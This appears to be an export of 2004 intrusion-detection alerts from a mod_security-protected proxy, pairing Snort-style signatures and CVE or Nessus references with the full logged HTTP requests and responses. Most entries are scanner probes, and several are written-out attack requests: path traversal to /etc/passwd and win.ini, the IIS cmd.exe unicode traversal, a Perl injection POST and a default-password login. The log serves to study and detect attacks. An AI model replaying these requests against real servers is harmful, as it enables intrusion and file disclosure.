1862 | Nessus 11001 | web-application-attack | WEB-CGI mrtg.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:23 2004] "GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1" 403 300 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mrtg.cgi ---------------------------------------- GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1868 | CVE-2001-0804 Nessus 10817 | default-login-attempt | WEB-CGI story.pl arbitrary file read attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:40:33 2004] "GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1869 | CVE-2001-0804 Nessus 10817 | default-login-attempt | WEB-CGI story.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:23 2004] "GET /cgi-bin/story.pl?next=about HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/story.pl] for 50000 ms ---------------------------------------- GET /cgi-bin/story.pl?next=about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/story\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1870 | CVE-2000-0117 Nessus 10253 | web-application-activity | WEB-CGI siteUserMod.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:50 2004] "GET /.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.1" 404 315 Handler: (null) Error: mod_security: Warning. Pattern match "/\.cobalt/siteUserMod/siteUserMod\.cgi" at THE_REQUEST. ---------------------------------------- GET /.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/\.cobalt/siteUserMod/siteUserMod\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1872 | Nessus 10848 | web-application-activity | WEB-MISC Oracle Dynamic Monitoring Services (dms) access | Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /dms0/ HTTP/1.1" 403 289 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/dms0 ---------------------------------------- GET /dms0/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1875 | Nessus 10780 Nessus 10779 | web-application-activity | WEB-CGI cgicso access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:16 2004] "GET /cgi-bin/cgicso?query=AAA HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgicso ---------------------------------------- GET /cgi-bin/cgicso?query=AAA HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1877 | CVE-2000-0868 Nessus 10503 | web-application-activity | WEB-CGI printenv access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:14 2004] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/printenv" at THE_REQUEST. ---------------------------------------- GET /cgi-bin-sdb/printenv HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/printenv" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1880 | Nessus 10348 BID1053 CVE-2000-0169 | web-application-activity | WEB-MISC oracle web application server access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /ows-bin/perlidlc.bat HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/ows-bin/" at THE_REQUEST. ---------------------------------------- GET /ows-bin/perlidlc.bat HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/ows-bin/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1945 | CVE-2000-0884 | web-application-attack | WEB-IIS unicode directory traversal attempt | Request: 68.48.142.117 - - [Tue Mar 9 22:29:43 2004] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/..%5c../winnt/system32/cmd.exe] for 50000 ms ---------------------------------------- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "cmd\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1946 | | web-application-activity | WEB-MISC answerbook2 admin attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:06 2004] "POST /cgi-bin/admin/admin.cgi HTTP/1.1" 404 303 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgi-bin/admin/admin" at THE_REQUEST. ---------------------------------------- POST /cgi-bin/admin/admin.cgi HTTP/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded Host: www.testproxy.net:8000 mod_security-message: Warning. Pattern match "/cgi-bin/admin/admin" at THE_REQUEST. login=1&user=Admin&password=ImageFolio&save=Login HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1969 | BID6091 | web-application-activity | WEB-MISC ion-p access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:32 2004] "GET /cgi-bin/ion-p.exe?page=c:\\winnt\\win.ini HTTP/1.1" 404 297 Handler: cgi-script Error: mod_security: Warning. Pattern match "/ion-p" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/ion-p.exe?page=c:\\winnt\\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/ion-p" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1979 | Nessus 11158 BID5520 | web-application-attack | WEB-MISC perl post attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:30:36 2004] "POST /perl/ HTTP/1.1" 404 285 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/perl/ ---------------------------------------- POST /perl/ HTTP/1.1 Content-Length: 60 Content-Type: application/octet-stream Host: www.testproxy.net mod_security-message: Access denied with code 200. Pattern match "/perl/" at THE_REQUEST. print("Content-Type: text/plain\r\n\r\n", "Nessus=", 42+42); HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1994 | Nessus 11165 | web-application-activity | WEB-CGI vpasswd.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /cgi-bin/vpasswd.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/vpasswd.cgi ---------------------------------------- GET /cgi-bin/vpasswd.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1996 | CAN-2001-0849 Nessus 11107 | web-application-activity | WEB-CGI viralator.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:02 2004] "GET /cgi-bin/viralator.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/viralator.cgi ---------------------------------------- GET /cgi-bin/viralator.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2000 | Nessus 11073 | web-application-activity | WEB-PHP readmsg.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:03 2004] "GET /base/webmail/readmsg.php HTTP/1.1" 404 304 Handler: (null) Error: mod_security: Warning. Pattern match "/readmsg\.php" at THE_REQUEST. ---------------------------------------- GET /base/webmail/readmsg.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/readmsg\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2001 | | web-application-activity | WEB-CGI smartsearch.cgi access | Request: 220.175.18.42 - - [Tue Mar 9 22:47:30 2004] "GET http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi HTTP/1.0" 200 26166 Handler: proxy-server Error: mod_security: Warning. Pattern match "/smartsearch\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: deflate Accept-Language: en Host: www.searchlikecrazy.com Proxy-Connection: Keep-Alive Referer: http://www.yourwindow.com/searchlikecrazy.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2) mod_security-message: Warning. Pattern match "/smartsearch\.cgi" at THE_REQUEST. HTTP/1.0 200 OK Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.testproxy.net Connection: close |
2052 | CA-2002-35 Nessus 11190 | web-application-activity | WEB-CGI overflow.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:11 2004] "GET /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1" 404 317 Handler: cgi-script Error: mod_security: Warning. Pattern match "/overflow\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/overflow\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2056 | BID9561 Nessus 11213 whitehatsec | web-application-attack | WEB-MISC TRACE attempt | Request: 66.36.242.145 - - [Tue Mar 9 23:49:16 2004] "GET http://www.above.net/cgi-bin/trace?203.199.64.132 HTTP/1.1" 200 578 Handler: proxy-server Error: mod_security: pausing [http://www.above.net/cgi-bin/trace?203.199.64.132] for 50000 ms ---------------------------------------- GET http://www.above.net/cgi-bin/trace?203.199.64.132 HTTP/1.1 Host: www.above.net Proxy-Connection: Keep-Alive mod_security-message: Access denied with code 200. Pattern match "TRACE" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2060 | Nessus 11180 | web-application-activity | WEB-MISC DB4Web access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:28 2004] "GET /DB4Web/port-scan.de:23/foo HTTP/1.1" 404 306 Handler: (null) Error: mod_security: Warning. Pattern match "/DB4Web/" at THE_REQUEST. ---------------------------------------- GET /DB4Web/port-scan.de:23/foo HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/DB4Web/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2066 | | web-application-attack | WEB-MISC Lotus Notes .pl script source download attempt | Request: 220.175.18.42 - - [Tue Mar 9 22:47:19 2004] "GET http://www.stayinvisible.com/index.pl/ip_test_result_nocache HTTP/1.0" 200 8030 Handler: proxy-server ---------------------------------------- GET http://www.stayinvisible.com/index.pl/ip_test_result_nocache HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: deflate Accept-Language: en Host: www.stayinvisible.com Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) HTTP/1.0 200 OK Set-Cookie: wgSession=19wtMvmh2HVMM; path=/; expires=Sat, 08-Mar-2014 04:04:57 GMT Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.stayinvisible.com, MISS from www.testproxy.net Connection: close |
2067 | | web-application-attack | WEB-MISC Lotus Notes .exe script source download attempt | Request: 212.57.187.242 - - [Tue Mar 9 22:11:27 2004] "GET https://www.chel.mts.ru/sms/cgi-bin/cgi_.exe?function=sms_send HTTP/1.1" 200 23501 Handler: proxy-server ---------------------------------------- GET https://www.chel.mts.ru/sms/cgi-bin/cgi_.exe?function=sms_send HTTP/1.1 Connection: Keep-Alive Host: www.chel.mts.ru Keep-Alive: 300 Referer: http://www.ya.ru/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.03 [en] HTTP/1.1 200 OK Set-cookie: session_id=UNI_chl2_37c3726f76530a0fe; Content-Type: text/html; charset=windows-1251 X-Cache: MISS from www.testproxy.net Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked |
2078 | BID6634 | web-application-activity | WEB-PHP phpBB privmsg.php access | Request: 217.136.209.143 - - [Fri Mar 12 07:29:20 2004] "GET http://boomslang.no-ip.com/forom/privmsg.php?folder=inbox&sid=e7e156cbecc071d9ab69211a33223abc HTTP/1.0" 302 0 Handler: proxy-server Error: mod_security: Warning. Pattern match "/privmsg\.php" at THE_REQUEST. ---------------------------------------- GET http://boomslang.no-ip.com/forom/privmsg.php?folder=inbox&sid=e7e156cbecc071d9ab69211a33223abc HTTP/1.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Language: fr,en;q=0.5 Cookie: BoOmTeAm[BoarD]_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; BoOmTeAm[BoarD]_sid=e7e156cbecc071d9ab69211a33223abc Host: boomslang.no-ip.com Keep-Alive: 300 Proxy-Connection: close Referer: http://boomslang.no-ip.com/forom/login.php?redirect=privmsg.php&folder=inbox&sid=d53404759076e80271dab6863c792e04 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7 mod_security-message: Warning. Pattern match "/privmsg\.php" at THE_REQUEST. HTTP/1.0 302 Found X-Powered-By: PHP/4.3.3 Set-Cookie: BoOmTeAm[BoarD]_data=a%3A0%3A%7B%7D; expires=Sat, 12-Mar-2005 12:29:29 GMT; path=/; domain=boomslang.no-ip.com Set-Cookie: BoOmTeAm[BoarD]_sid=ae9204467a79b964054b22ead15c1dba; path=/; domain=boomslang.no-ip.com Location: http://boomslang.no-ip.com/forom/login.php?redirect=privmsg.php&folder=inbox&sid=ae9204467a79b964054b22ead15c1dba Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
2085 | CAN-2003-0054 | web-application-activity | WEB-CGI parse_xml.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:50 2004] "GET /AdminHTML/parse_xml.cgi HTTP/1.1" 404 303 Handler: (null) Error: mod_security: Warning. Pattern match "/parse_xml\.cgi" at THE_REQUEST. ---------------------------------------- GET /AdminHTML/parse_xml.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/parse_xml\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2115 | BID7444 | web-application-activity | WEB-CGI album.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:52 2004] "GET /cgi-bin/album.pl?function=about HTTP/1.1" 404 296 Handler: cgi-script Error: mod_security: Warning. Pattern match "/album\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/album.pl?function=about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/album\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2127 | Nessus 11605 BID7361 | web-application-activity | WEB-CGI ikonboard.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:56 2004] "GET /cgi-bin/ikonboard.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ikonboard.cgi ---------------------------------------- GET /cgi-bin/ikonboard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Cookie: lang=%2E%00%22 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2129 | ms03-018 Nessus 11664 | web-application-activity | WEB-IIS nsiislog.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:38 2004] "GET /scripts/nsiislog.dll HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/nsiislog\.dll" at THE_REQUEST. ---------------------------------------- GET /scripts/nsiislog.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/nsiislog\.dll" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2130 | BID7675 Nessus 11662 | web-application-activity | WEB-IIS IISProtect siteadmin.asp access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:38 2004] "GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1" 404 310 Handler: (null) Error: mod_security: Warning. Pattern match "/iisprotect/admin/SiteAdmin\.asp" at THE_REQUEST. ---------------------------------------- GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/iisprotect/admin/" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2133 | CAN-2003-0118 CAN-2003-0117 BID7470 BID7469 Nessus 11638 | web-application-activity | WEB-IIS MS BizTalk server access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:43 2004] "POST /manual/biztalkhttpreceive.dll HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/manual/biztalkhttpreceive.dll ---------------------------------------- POST /manual/biztalkhttpreceive.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Content-Length: 6 Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) [POST payload not available] HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2134 | Nessus 11621 | web-application-activity | WEB-IIS register.asp access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:20 2004] "POST /forum/register.asp?mode=DoIt HTTP/1.1" 404 298 Handler: (null) Error: mod_security: Warning. Pattern match "/register\.asp" at THE_REQUEST. ---------------------------------------- POST /forum/register.asp?mode=DoIt HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate,compress;q=0.9 Accept-Language: en-us,en;q=0.5 Content-Length: 167 Content-Type: application/x-www-form-urlencoded Host: www.testproxy.net Referer: http:/www.testproxy.net/forum/register.asp User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.3) mod_security-message: Warning. Pattern match "/register\.asp" at THE_REQUEST. Refer=&Email=test%27example.org&Email2=&HideMail=0&ICQ=&YAHOO=&AIM=&Homepage=&Link1=&Link2=&Name=test&Password=test&Password-d=&Country=&Sig=&MEMBER_ID=&Submit1=Submit HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2135 | Nessus 11682 | web-application-activity | WEB-MISC philboard.mdb access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:12 2004] "GET /forum/database/philboard.mdb HTTP/1.1" 404 308 Handler: (null) Error: mod_security: Warning. Pattern match "/philboard\.mdb" at THE_REQUEST. ---------------------------------------- GET /forum/database/philboard.mdb HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/philboard\.mdb" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2137 | BID7739 Nessus 11675 | web-application-activity | WEB-MISC philboard_admin.asp access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /philboard/philboard_admin.asp HTTP/1.1" 404 309 Handler: (null) Error: mod_security: Warning. Pattern match "/philboard_admin\.asp" at THE_REQUEST. ---------------------------------------- GET /philboard/philboard_admin.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/philboard_admin\.asp" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2138 | BID6996 Nessus 11639 | web-application-activity | WEB-MISC logicworks.ini access | Request: 217.160.165.173 - - [Fri Mar 12 22:36:47 2004] "GET /cgi-bin/logicworks.ini HTTP/1.1" 404 302 Handler: cgi-script Error: mod_security: Warning. Pattern match "/logicworks\.ini" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/logicworks.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/logicworks\.ini" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2140 | Nessus 11669 | web-application-activity | WEB-PHP p-news.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:03 2004] "GET /news/p-news.php HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/p-news\.php" at THE_REQUEST. ---------------------------------------- GET /news/p-news.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/p-news\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
